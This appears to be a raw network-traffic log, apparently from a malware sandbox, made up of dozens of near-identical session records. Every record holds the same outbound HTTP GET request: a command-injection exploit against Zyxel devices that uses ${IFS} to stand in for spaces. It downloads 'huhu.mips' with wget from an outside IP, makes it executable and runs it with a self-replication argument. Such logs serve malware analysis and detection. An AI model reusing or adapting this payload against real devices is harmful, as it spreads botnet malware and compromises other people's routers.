                                                      Feb 2, 2024 06:35:52.611766100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4302192.168.2.144843284.103.187.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611809015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4303192.168.2.1451324192.212.122.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611849070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4304192.168.2.14360681.232.241.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611867905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4305192.168.2.1432948185.19.210.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611926079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4306192.168.2.145336635.143.137.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611944914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4307192.168.2.1450666138.143.251.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.611998081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4308192.168.2.1457568173.251.139.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612027884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4309192.168.2.145443052.15.91.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612072945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4310192.168.2.1455092156.154.175.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612109900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4311192.168.2.1444936208.178.0.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612163067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4312192.168.2.145889071.27.196.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612195969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4313192.168.2.1445710103.225.202.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612246990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4314192.168.2.1452268124.224.64.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612272024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4315192.168.2.1434478115.252.230.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612312078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4316192.168.2.144741863.199.226.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612370968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4317192.168.2.143417271.69.21.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612396002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4318192.168.2.143858034.21.65.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612453938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4319192.168.2.145870834.107.81.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612483025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4320192.168.2.1440408112.41.32.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612528086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4321192.168.2.145488291.140.4.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612552881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4322192.168.2.1439232102.113.94.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612605095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4323192.168.2.145710478.220.142.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612652063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4324192.168.2.1448238220.215.174.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612685919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4325192.168.2.1459816146.121.126.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612751961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4326192.168.2.1447572196.170.254.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612776995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4327192.168.2.144148818.105.113.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612838984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4328192.168.2.1459208148.117.177.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612890959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4329192.168.2.1456280183.181.201.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612929106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4330192.168.2.14455024.128.67.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.612958908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4331192.168.2.1432898171.22.255.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613004923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4332192.168.2.145037027.216.192.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613042116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4333192.168.2.144608678.98.237.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613080025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4334192.168.2.1441136189.118.65.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613111019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4335192.168.2.144682854.56.164.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613146067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4336192.168.2.1441646206.194.182.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613187075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4337192.168.2.1442624181.71.190.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613229990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4338192.168.2.1446366199.218.111.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613276005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4339192.168.2.1439786115.118.87.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613321066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4340192.168.2.1433106192.164.111.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613343954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4341192.168.2.143294849.120.216.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613390923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4342192.168.2.1453516178.154.24.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613411903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4343192.168.2.1440536116.204.99.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613462925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4344192.168.2.1442832111.9.160.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613506079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4345192.168.2.1448918140.0.200.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613549948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4346192.168.2.144704888.219.187.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613607883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4347192.168.2.1447480160.86.29.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613636017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4348192.168.2.144029072.157.3.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613667965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4349192.168.2.1453504162.145.90.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613703966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4350192.168.2.143502693.252.188.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613739014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4351192.168.2.145112840.27.96.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613791943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4352192.168.2.143352247.147.120.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613823891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4353192.168.2.1451206124.101.38.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613893032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4354192.168.2.143381448.215.103.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613920927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4355192.168.2.1455756183.128.87.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.613972902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4356192.168.2.145558634.182.252.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614012957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4357192.168.2.1444818144.251.101.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614063025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4358192.168.2.145754064.232.4.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614105940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4359192.168.2.1434100144.32.138.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614129066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4360192.168.2.1452622171.191.103.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614161968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4361192.168.2.145909048.253.218.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614218950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4362192.168.2.145423238.209.120.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614234924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4363192.168.2.1447100152.190.217.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.614293098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4364192.168.2.144876419.178.153.184443
                                                      TimestampBytes transferredDirectionData
